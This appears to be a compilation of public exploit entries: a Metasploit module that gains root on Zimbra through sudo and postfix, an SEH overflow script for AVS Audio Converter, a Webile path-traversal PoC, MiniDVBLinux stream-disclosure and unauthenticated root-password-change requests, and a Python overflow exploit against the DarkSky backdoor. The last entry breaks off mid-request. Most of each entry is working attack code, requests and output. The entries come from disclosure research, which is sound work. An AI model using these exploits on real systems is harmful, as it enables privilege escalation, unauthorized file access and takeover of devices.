<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Zimbra sudo + postfix privilege escalation',<br /> 'Description' => %q{<br /> This module exploits a vulnerable sudo configuration that permits the<br /> zimbra user to execute postfix as root. In turn, postfix can execute<br /> arbitrary shellscripts, which means it can execute a root shell.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'EvergreenCartoons', # discovery and poc<br /> 'Ron Bowes', # Module<br /> ],<br /> 'DisclosureDate' => '2022-10-13',<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2022-3569' ],<br /> [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ],<br /> ],<br /> 'Targets' => [<br /> [ 'Auto', {} ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),<br /> OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),<br /> ]<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('PayloadFilename', [ false, 'The name to use for the executable (default: ".<random>"' ])<br /> ]<br /> end<br /><br /> # Because this isn't patched, I can't say with 100% certainty that this will<br /> # detect a future patch (it depends on how they patch it)<br /> def check<br /> # Sanity check<br /> if is_root?<br /> fail_with(Failure::None, 'Session already has root privileges')<br /> end<br /><br /> unless file_exist?("#{datastore['ZIMBRA_BASE']}/common/sbin/postfix")<br /> print_error("postfix executable not detected: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")<br /> return CheckCode::Safe<br /> end<br /><br /> unless command_exists?(datastore['SUDO_PATH'])<br /> print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")<br /> return CheckCode::Safe<br /> end<br /><br /> # Run `sudo -n -l` to make sure we have access to the target command<br /> cmd = "#{datastore['SUDO_PATH']} -n -l"<br /> print_status "Executing: #{cmd}"<br /> output = cmd_exec(cmd).to_s<br /><br /> if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')<br /> print_error('Current user could not execute sudo -l')<br /> return CheckCode::Safe<br /> end<br /><br /> if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix")<br /> print_error('Current user does not have access to run postfix')<br /> return CheckCode::Safe<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> base_dir = datastore['WritableDir'].to_s<br /> unless writable?(base_dir)<br /> fail_with(Failure::BadConfig, "#{base_dir} is not writable")<br /> end<br /><br /> # Generate some filenames<br /> payload_path = File.join(base_dir, datastore['PayloadFilename'] || ".#{rand_text_alphanumeric(5..10)}")<br /> upload_and_chmodx(payload_path, generate_payload_exe)<br /> register_file_for_cleanup(payload_path)<br /><br /> cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}"<br /> print_status "Attempting to trigger payload: #{cmd}"<br /> out = cmd_exec(cmd)<br /><br /> unless session_created?<br /> print_error("Failed to create session! Cmd output = #{out}")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)<br /># Discovered by: Yehia Elghaly - Mrvar0x<br /># Discovered Date: 2022-10-16<br /># Tested Version: 10.3.1.633<br /># Tested on OS: Windows 7 Professional x86<br /><br />#pop+ret Address=005154E6<br />#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] <br />#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)<br /><br /># The only module that has SafeSEH disabled.<br /># Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | <br /># 0x00400000 | 0x01003000 | False | False | False | False | False |<br /><br />#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.<br /><br />#Buffer = '\x41'* 260<br />#nSEH = '\x42'*4<br />#SEH = '\x43'*4<br />#ESI = 'D*44' # ESI Overwrite <br /><br />#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44<br />#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44<br /><br /><br /># Rexploit:<br /># Generate the 'evil.txt' payload using python 2.7.x on Linux.<br /># Open the file 'evil.txt' Copy.<br /># Paste at'Output Folder and click 'Browse'.<br /><br />#!/usr/bin/python -w<br /> <br />filename="evil.txt"<br /> <br />buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44<br /> <br />textfile = open(filename , 'w')<br />textfile.write(buffer)<br />textfile.close()<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Webile v1.0.1 - Directory Traversal Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2320<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2320<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.3<br /><br /><br />Vulnerability Class:<br />====================<br />Directory- or Path-Traversal<br /><br /><br />Current Estimated Price:<br />========================<br />1.000€ - 2.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in<br />the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,<br />statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other<br />functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,<br />Windows, Linux, iOS, Android and other multi-platform operating systems.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: Webile<br />Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-02-06: Researcher Notification & Coordination (Security Researcher)<br />2022-02-07: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A directory traversal web vulnerability has been discovered in the Webile v1.0.1 wifi mobile web application.<br />The vulnerability allows remote attackers to change the application path in performed requests to compromise the<br />local application or file-system of a mobile device. Attackers are for example able to request environment<br />variables or a sensitive system path.<br /><br />The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is not<br />secure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files without<br />secure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.<br /><br />Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.<br />Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.<br />For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/<br /><br /><br />--- PoC Session Logs ---<br />http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: text/html; charset=UTF-8<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: chunked<br /><br /><br />--- FS Session Logs ---<br />Output:<br />File name <br />bluetooth<br />bpf<br />carrier<br />compatconfig<br />init<br />permissions<br />ppp<br />seccomp_policy<br />security<br />selinux<br />sensors<br />sysconfig<br />textclassifier<br />theme<br />vintf<br />epdg<br />ipm<br /><br /><br />Security Risk:<br />==============<br />The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application suffers from an unauthenticated live stream<br />disclosure when /tpl/tv_action.sh is called and generates a snapshot<br />in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).<br /><br />--------------------------------------------------------------------<br />/var/www/tpl/tv_action.sh:<br />--------------------------<br />01: #!/bin/sh<br />02:<br />03: header<br />04:<br />05: quality=60<br />06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"<br />07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null<br />--------------------------------------------------------------------<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5716<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />1. Generate screengrab:<br /> - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"<br /> - Response: <br />220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8<br />250 Grabbed image /tmp/tv.jpg 60<br />221 mld closing connection<br /><br />2. View screengrab:<br /> - Request: curl http://ip:8008/images/tv.jpg<br /><br />3. Or use a browser:<br /> - http://ip:8008/home?site=remotecontrol<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.DarkSky.23<br />Vulnerability: Remote Stack Buffer Overflow (SEH)<br />Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.<br />Family: DarkSky<br />Type: PE32<br />MD5: 1164ef21ef2af97e0339359c0dce5e7d<br />Vuln ID: MVID-2022-0648<br />Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 10/15/2022<br /><br />Example:<br /><br />0040134A | 80 34 31 11 | xor byte ptr ds:[ecx+esi],11 | ;XOR converting the payload happens here.<br />0040134E | 41 | inc ecx |<br />0040134F | 3B C8 | cmp ecx,eax |<br />00401351 | 7C F7 | jl sysarchive.40134A |<br />00401353 | 5E | pop esi |<br />00401354 | C3 | ret |<br /><br /><br />Python test...<br /><br />>>> 0x41 ^ 0x11<br />80<br />>>> hex(80)<br />'0x50'<br />>>> chr(0x50)<br />'P'<br /><br />GET /AAAAA will then become all "P" ...<br /><br />0019D24C 56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41 VTE1>PPPPPAAAAAA <br />0019D25C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D26C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D27C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D28C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br /><br />So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.<br /><br />>>> 0x50 ^ 0x11<br />65<br />>>> hex(65)<br />'0x41'<br />>>> chr(65)<br />'A'<br /><br />EAX : 7EFEFEFE<br />EBX : 02902A58<br />ECX : 0019F4B0<br />EDX : 41414141<br />EBP : 0019D230<br />ESP : 0019D214<br />ESI : 0019D777<br />EDI : 0019FF81<br />EIP : 7451561B msvcrt.7451561B<br /><br /><br />Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" <br /><br />0019D240 08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31 .ß...ß......VTE1 <br />0019D250 3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 >AAAAAAAAAAAAAAA <br />0019D260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 AAAAAAAAAAAAAAAP <br />0019D290 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP <br />0019D2A0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP<br /><br /><br />Memory Dump:<br />(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002<br />eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0 nv up ei pl nz ac pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd<br />eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />msvcrt!strcat+0x89:<br />74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000<br />*** WARNING: Unable to verify checksum for SysArchive.exe<br />*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />msvcrt!strcat+89<br />74515619 8917 mov dword ptr [edi],edx<br /><br />EXCEPTION_RECORD: 0019cd64 -- (.exr 0x19cd64)<br />ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000008<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 001a0000<br />Attempt to write to address 001a0000<br /><br />PROCESS_NAME: SysArchive.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br /><br />EXCEPTION_PARAMETER1: 00000015<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 70<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt<br /> 74515590 - msvcrt!strcat<br /> [ 8b:cc ]<br /> 74515617 - msvcrt!strcat+87 (+0x87)<br /> [ eb:cc ]<br />2 errors : !msvcrt (74515590-74515617)<br /><br />CONTEXT: 0019cdb4 -- (.cxr 0x19cdb4)<br />eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd<br />eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />msvcrt!strcat+0x89:<br />74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000<br />Resetting default scope<br /><br />WRITE_ADDRESS: 001a0000 <br /><br />FOLLOWUP_IP: <br />msvcrt!strcat+89<br />74515619 8917 mov dword ptr [edi],edx<br /><br />FAULTING_THREAD: 0000242c<br /><br />BUGCHECK_STR: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 00404ed7 to 74515619<br /><br />STACK_TEXT: <br />0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89<br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7<br />0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394<br />0019f9ec 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f0 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f4 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f8 41414141 41414141 41414141 41414141 0x41414141<br />0019f9fc 41414141 41414141 41414141 41414141 0x41414141<br />0019fa00 41414141 41414141 41414141 41414141 0x41414141<br />0019fa04 41414141 41414141 41414141 41414141 0x41414141<br />0019fa08 41414141 41414141 41414141 41414141 0x41414141<br />0019fa0c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa10 41414141 41414141 41414141 41414141 0x41414141<br />0019fa14 41414141 41414141 41414141 41414141 0x41414141<br />0019fa18 41414141 41414141 41414141 41414141 0x41414141<br />0019fa1c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa20 41414141 41414141 41414141 41414141 0x41414141<br />0019fa24 41414141 41414141 41414141 41414141 0x41414141<br />0019fa28 41414141 41414141 41414141 41414141 0x41414141<br />0019fa2c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa30 41414141 41414141 41414141 41414141 0x41414141<br />...<br /><br />SYMBOL_NAME: memory_corruption!msvcrt<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: memory_corruption<br /><br />IMAGE_NAME: memory_corruption<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 0<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb<br /><br />FAILURE_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt<br /><br />BUCKET_ID: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt<br /><br />0:000> !exchain<br />0019cc18: ntdll!_except_handler4+0 (77716a50)<br /> CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (777557ad)<br />0019f9dc: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=5418<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000<br /> PAYLOAD=JUNK+"\r\n\r\n"<br /><br /> s.send(PAYLOAD)<br /> s.close()<br /> print("Backdoor DarkSky.23 Exploit By malvuln")<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Change Root Password PoC<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application allows a remote attacker to change the root<br />password of the system without authentication (disabled by default)<br />and verification of previously assigned credential. Command execution<br />also possible using several POST parameters.<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5715<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />Default root password: mld500<br /><br />Change system password:<br />-----------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6<br />Cache-Control: max-age=0<br />Connection: keep-alive<br />Content-Length: 778<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba<br />Host: ip:8008<br />Origin: http://ip:8008<br />Referer: http://ip:8008/?site=setup&section=System<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36<br />sec-gpc: 1<br /><br />APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+<br /><br /><br />Pretty post data:<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: /etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: r00t<br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br />SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br />TIMEZONE_command: /etc/setup/locales.sh settimezone<br />TIMEZONE: Europe/Kumanovo<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />action: save<br />params: <br />changed: SYSTEM_PASSWORD <br /><br /><br />Eenable webif password check:<br />-----------------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: /etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: <br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br 